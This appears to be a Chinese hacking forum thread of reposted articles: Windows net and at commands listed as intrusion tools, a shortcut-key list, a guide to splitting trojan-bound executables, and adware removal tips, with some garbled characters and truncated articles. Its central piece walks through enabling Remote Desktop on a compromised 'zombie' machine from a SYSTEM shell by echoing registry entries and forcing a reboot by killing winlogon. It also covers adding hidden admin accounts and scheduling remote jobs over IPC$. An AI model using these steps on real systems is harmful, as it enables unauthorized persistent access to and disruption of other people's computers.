[讨论]黑客技术讨论专帖

嬡哭鬼'

黑客常用的命令和快捷键

黑客入侵中常用的命令：

*net user 查看用户列表
*net user 用户名 密码 /add 添加用户
*net user 用户名 密码 更改用户密码
*net localgroup administrators 用户名 /add 添加用户到管理组
*net user 用户名 /delete 删除用户
*net user 用户名 查看用户的基本情况
*net user 用户名 /active:no 禁用该用户
*net user 用户名 /active:yes 启用该用户

*net share 查看计算机IPC$共享资源
*net share 共享名 查看该共享的情况
*net share 共享名=路径 设置共享。例如 net share c$=c:
*net share 共享名 /delete 删除IPC$共享

*net use 查看IPC$连接情况
*net use \\ip\ipc$ "密码" /user:"用户名" ipc$连接

*net time \\ip 查看远程计算机上的时间

*copy 路径:\文件名 \\ip\共享名 复制文件到已经ipc$连接的计算机上

*net view ip 查看计算机上的共享资源

*ftp 服务器地址 进入FTP服务器

*at 查看自己计算机上的计划作业
*at \\ip 查看远程计算机上的计划作业
*at \\ip 时间 命令(注意加盘符) 在远程计算机上加一个作业
*at \\ip 计划作业ID /delete 删除远程计算机上的一个计划作业
*at \\ip all /delete 删除远程计算机上的全部计划作业

　

珍藏的最全的windows操作系统快捷键

一、常见用法：
F1　　　　　　　　　　　显示当前程序或者windows的帮助内容。
F2　　　　　　　　　　　当你选中一个文件的话，这意味着“重命名”
F3　　　　　　　　　　　当你在桌面上的时候是打开“查找：所有文件” 对话框
F10或ALT　　　　　　　　激活当前程序的菜单栏
windows键或CTRL+ESC　　 打开开始菜单
CTRL+ALT+DELETE　　　　 在win9x中打开关闭程序对话框
DELETE　　　　　　　　　删除被选择的选择项目，如果是文件，将被放入回收站
SHIFT+DELETE　　　　　　删除被选择的选择项目，如果是文件，将被直接删除而不是放入回收站
CTRL+N　　　　　　　　　新建一个新的文件
CTRL+O　　　　　　　　　打开“打开文件”对话框
CTRL+P　　　　　　　　　打开“打印”对话框
CTRL+S　　　　　　　　　保存当前操作的文件
CTRL+X　　　　　　　　　剪切被选择的项目到剪贴板
CTRL+INSERT 或 CTRL+C　 复制被选择的项目到剪贴板
SHIFT+INSERT 或 CTRL+V　粘贴剪贴板中哪谌莸降鼻拔恢?
ALT+BACKSPACE 或 CTRL+Z 撤销上一步的操作
ALT+SHIFT+BACKSPACE　　 重做上一步被撤销的操作
　
Windows键+M　　　　　　 最小化所有被打开的窗口。
Windows键+CTRL+M　　　　重新将恢复上一项操作前窗口的大小和位置
Windows键+E　　　　　　 打开资源管理器
Windows键+F　　　　　　 打开“查找：所有文件”对话框
Windows键+R　　　　　　 打开“运行”对话框
Windows键+BREAK　　　　 打开“系统属性”对话框
Windows键+CTRL+F　　　　打开“查找：计算机”对话框
SHIFT+F10或鼠标右击　　 打开当前活动项目的快捷菜单
SHIFT　　　　　　　　　 在放入CD的时候按下不放，可以跳过自动播放CD。在打开word的时候按下不放，可以跳过自启动的宏
　
ALT+F4　　　　　　　　　关闭当前应用程序
ALT+SPACEBAR　　　　　　打开程序最左上角的菜单
ALT+TAB　　　　　　　　 切换当前程序
ALT+ESC　　　　　　　　 切换当前程序
ALT+ENTER　　　　　　　 将windows下运行的MSDOS窗口在窗口和全屏幕状态间切换
PRINT SCREEN　　　　　　将当前屏幕以图象方式拷贝到剪贴板
ALT+PRINT SCREEN　　　　将当前活动程序窗口以图象方式拷贝到剪贴板
CTRL+F4　　　　　　　　 关闭当前应用程序中的当前文本（如word中）
CTRL+F6　　　　　　　　 切换到当前应用程序中的下一个文本（加shift 可以跳到前一个窗口）

在IE中：

ALT+RIGHT ARROW　　　　 显示前一页（前进键）
ALT+LEFT ARROW　　　　　显示后一页（后退键）
CTRL+TAB　　　　　　　　在页面上的各框架中切换（加shift反向）
F5　　　　　　　　　　　刷新
CTRL+F5　　　　　　　　 强行刷新

　
　　目的快捷键

　　激活程序中的菜单栏 F10

　　执行菜单上相应的命令 ALT+菜单上带下划线的字母

　　关闭多文

嬡哭鬼'

黑客必学——开启肉鸡终端全攻略

今天介绍的这种开终端的方法，绿色，环保，无污染~~

　　不须上传任何文件开启终端的方法适合win2k,xp,2003.

　　本文前提是已经通过某种方法得到了对方的一个SYSTEM权限的CMDSHELL~~

　　在无须传任何文件的情况下开启终端服务。

　　一、win 2k下终端开启终端

　　首先用ECHO写一个3389.reg文件,然后导入到注册表，echo代码如下：

　　echo Windows Registry Editor Version 5.00 >>3389.reg

　　echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg

　　echo "Enabled"="0" >>3389.reg

　　echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>3389.reg

　　echo "ShutdownWithoutLogon"="0" >>3389.reg

　　echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>3389.reg

　　echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg

　　echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg

　　echo "TSEnabled"=dword:00000001 >>3389.reg

　　echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg

　　echo "Start"=dword:00000002 >>3389.reg

　　echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>3389.reg

　　echo "Start"=dword:00000002 >>3389.reg

　　echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg

　　echo "Hotkey"="1" >>3389.reg

　　echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg

　　echo "PortNumber"=dword:00000D3D >>3389.reg

　　echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg

　　echo "PortNumber"=dword:00000D3D >>3389.reg

　　把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件，接着regedit /s 3389.reg导入注册表。

　　(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)

　　因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效。

　　一个简单的办法就是用ntsd.exe(win 2k以上自带的命令)结束一个重要的进程就可以实现机器重启了！！

　　比如结束winlogon.exe,lsass.exe也可以但结束后会跳出重启倒计时(不太好~)

　　winlogon.exe被关闭后机器立刻强制重启了

　　命令执行格式为ntsd -c q -p PID
　那如何知道winlogon.exe的PID进程号呢~

　　以下这个脚本可以列举当前所有进程的PID：

　　wscript.echo "PID　 ProcessName"

　　for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_

　　wscript.echo ps.handle&vbtab&ps.name

　　next

　　在CMDSHELL窗口下贴上如下ECHO代码就可以得到查看进程PID的脚本1.vbe：

　　echo wscript.echo "PID　 ProcessName">>1.vbe

　　echo for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_ >>1.vbe

　　echo wscript.echo ps.handle^&vbtab^&ps.name>>1.vbe

　　echo next>>1.vbe

　　生成1.vbe后请检

嬡哭鬼'

巧妙分离带木马的文件

第一步:用UltraEdit的十六进制方式打开绑定程序，选中第二个MZ到第三个MZ之间的内容(即第二个文件)，将该部分复制。然后新建一个文件，粘贴，保存为EXE文件。

　　第二步:选中第三个MZ至文件末尾之间的内容(即第三个文件)，同样复制，新建文件后粘贴、保存为EXE文件。

　　第三步:现在你要通过检查两个文件的图标及大小来判断哪个文件是所需的正常程序。一般来说，所需程序文件与捆绑后的图标一致，且文件体积较大的那个文件就是我们所要的原文件。

上一篇文章： 命令提示符恢复本地安全策略小技巧 下一篇文章： 黑客必学——开启肉鸡终端全攻略

嬡哭鬼'

清剿流氓软件 八大绝技

上网冲浪原本是一大快事，但我们动辄就被不断跳出的广告页面晃得眼花缭乱，无所适从，刹那间让喜悦心情化为乌有。
　　浏览吧！IE被莫名修改。下载吧！不请自来多了很多卸载不了的无用插件！网上交易吧！还要小心信息被间谍软件记录，如此上网还有什么乐趣？“流氓软件”是网民们对此类软件的称呼，在北京市网络行业协会设立的“流氓软件”网络调查专门网站上，20多万人投票抗议和3624条举报帖是网民的回应，7月11日，北京网络行业协会在协会内部网站上点名公布了10款流氓软件，并敦促相关公司于8月15日前进行整改。
　　但整改毕竟是被动的，已经被“流氓软件”侵犯的用户如何进行清理呢？本专题将有针对性地展开。
1、彻底请出3721，动用注册表！ 
　　目前有两种方式删除3721，一是自动卸载，二是手动下载，具体步骤为重新启动计算机，按“F8”键进入启动模式菜单，选择“SafeMode”进入安全模式。依次点击“开始，运行”，输入regedit打开注册表编辑器。展开注册表到[HKEY_LOCAL_MACHINE \SOFTWARE\Microsoft\ InternetExplorer\ AdvancedOptions]，删除CNS目录，这个目录在“Internet选项-高级”中加入了3721网络实名的选项；展开注册表到[HKEY_LOCAL_MACHINE\ SOFTWARE\3721]以及[HKEY_CURRENT_USER\Software \3721]，删除整个3721目录；展开注册表到[HKEY_CURRENT_USER\Software \Microsoft\InternetExplorer \Main]，删除CNSEnable等几个以CNS开头的键。在清除完注册表后，还需要……
　　WindowsXP SP2的用户只要在遇到相关3721安装选项提示的时候选择否就可以了。
2、拒绝“淘宝”广告，关键在于屏敝！ 
　　卸载方法有四，最简单的如在MyIE或者Maxthon里面的“弹出窗口过滤”和“网页内容过滤”里面同时添加“unionsky、allyes、taobao”等过滤条目！更直接的方法是使用用世界之窗浏览器，不用任何设置，默认即可屏蔽！对于没有过滤功能的IE，如果系统是XP/2003，请在“开始，运行”中输入：%SystemRoot\system32 \notepad.exe C:\WINDOWS\ system32\drivers\etc\hosts 如果系统是98/me，请在“开始，运行”中输入：%SystemRoot%\system32\notepad.exe C:\WINDOWS\hosts 或点击这里下载自动运行命令，解压后选择合适的bat文件双击运行，然后，将下列语句添加到最后一行。
3、清除易趣插件！解铃还需系铃人？ 
　　对易趣广告的屏蔽可以参考上面对淘宝网广告的方法。但删除易趣插件就比较繁琐了。首先，易趣插件没有提供卸载工具。第二，易趣插件不能通过如windows优化大师这样的软件下载，因为系统文件已经被替换到了不能识别的版本而失败。
　　在2005年7月21日更新的暴风影音5.07正式版中，包括了针对流氓软件的三个清除小程序：分别是易趣清除程序UebayFOR暴风和酷狗.rar，可以清除易趣广告和几个广告链接。其次还有暴风去广告安装外挂程序以及暴风去广告安装外挂可选组件版程序。运行这些程序附件，不但能够自动去掉一搜和下载加速器的选项，还能安装后自动清除易趣广告。而且这一版的软件目前已经可以手动不安装易趣了。
4、卸载dudu下载加速器，斩草要除根！ 
　　方法一：手动卸载（有一定风险，先做好注册表等备份）
1.首先到添加与删除程序里卸载“dudu”。
2.运行注册表编辑器（开始、运行、regedit、编辑、查找）查找与“dudu、ddd6c、dddsetup、dddupdate、DuDuAcc”等相关相删除。
3.开始、搜索、搜索电脑中的“dudu、ddd6c、dddupdate、dddsetup、DuDuAcc”等相关项删除。
4.开始、设置、控制面板、性能和维护、任务计划里面把 DUDU的任务删掉
5.手动查找系统中与“dudu、ddd6c、dddupdate、dddsetup、DuDuAcc”等相关相删除。
6.重启电脑
方法二：自动卸载（风险低，建议使用）
在计算机的“program files”目录，会有一个叫“desktop media”目录，运行其中的uninstall.exe程序，即可。
5、删除中文上网与青娱乐，别被迷惑！ 
　　删除中文上网的具体方法是，进入“控制面板”的“添加/删除程序”选项，找到“中文上网官方版软件”，卸载。根据提示，选择要卸载的“中文域名IE客户端软件”和“中文域名邮件客户端软件”，输入“确认码”，进入下一步确认是否保留某些功能，确认保留或不保留后继续卸载，卸载完成会显示“中文上网官方版软件卸载成功!”的提示。
　　

11671062

 

[em07]

[此贴子已经被se7en于2007-1-7 14:41:00编辑过]

單の行道

虽貌似罐水..

但是.是给大家些参考而已....

 

[em07]